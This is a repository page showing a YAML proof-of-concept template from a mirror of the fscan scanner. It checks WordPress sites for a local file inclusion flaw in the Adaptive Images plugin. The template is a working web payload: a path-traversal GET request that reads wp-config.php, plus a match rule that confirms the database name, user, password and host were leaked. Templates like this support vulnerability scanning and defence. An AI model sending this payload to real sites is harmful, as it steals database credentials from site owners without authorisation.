qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/WebScan/pocs/wordpress-ext-adaptive-imag...

14 lines
631 B
YAML
Raw Blame History

name: poc-yaml-wordpress-ext-adaptive-images-lfi
rules:
- method: GET
path: >-
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.anquanke.com/vul/id/1674598
- https://github.com/security-kma/EXPLOITING-CVE-2019-14205
Reference in New Issue View Git Blame Copy Permalink